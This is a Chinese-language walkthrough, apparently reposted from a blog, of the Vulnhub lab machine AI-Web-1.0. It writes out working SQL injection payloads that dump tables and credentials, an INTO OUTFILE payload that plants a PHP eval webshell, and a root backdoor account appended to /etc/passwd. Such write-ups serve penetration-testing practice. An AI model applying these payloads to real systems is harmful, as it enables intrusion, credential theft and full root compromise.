其他分享
首页 > 其他分享> > Vulnhub靶机:AI-Web-1.0

Vulnhub靶机:AI-Web-1.0

作者:互联网

1.信息收集

使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。
img
使用nmap对把目标机进行端口扫描,发现只开启了80端口。
img
访问80端口,发现页面只有一句话,没什么可利用的信息。
img

使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。
img

2.漏洞探测与利用

尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。
img

依次访问这两个目录,提示无权访问。
img

那么尝试访问/se3reTdir777/目录,出现一个提交框。
img

搜集更多信息,扫描这两个目录下是否还有其他目录,结果扫描出m3diNf0目录下有info.php,访问该文件,发现是phpinfo探针,存在信息泄露。
img

2.1 SQL注入

猜测可能存在注入,显示正常,存在注入。
img

-1' union select 1,database(),user() -- -

img

-1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' -- -

img

-1' union select 1,column_name,3 from information_schema.columns where table_name='user' -- -

img

-1' union select 1,column_name,3 from information_schema.columns where table_name='systemUser' -- -

img

-1' union select id,firstName,lastName from user -- -

img

爆破systemUser表的内容。

-1' union select id,userName,password from systemUser -- -

img

2.2 尝试into outfile 写shell

首先需要获知网站的绝对路径,在phpinfo探针中找到网站绝对路径。

img

尝试在文件上传目录/se3reTdir777/uploads中写入一句话木马。

-1' union select 1,2,'<?php @eval($_POST[123]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php" -- -

img

使用蚁剑成功连接。

img

3.反弹shell

img

img

4.提权

img

openssl passwd -1 -salt hack hack

img

hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash
echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash' >> etc/passwd

img

img

5.总结归纳

5.总结归纳

标签:Web,1.0,提权,AI,etc,--,passwd,hack,select
来源: https://blog.csdn.net/Aydn115/article/details/122611351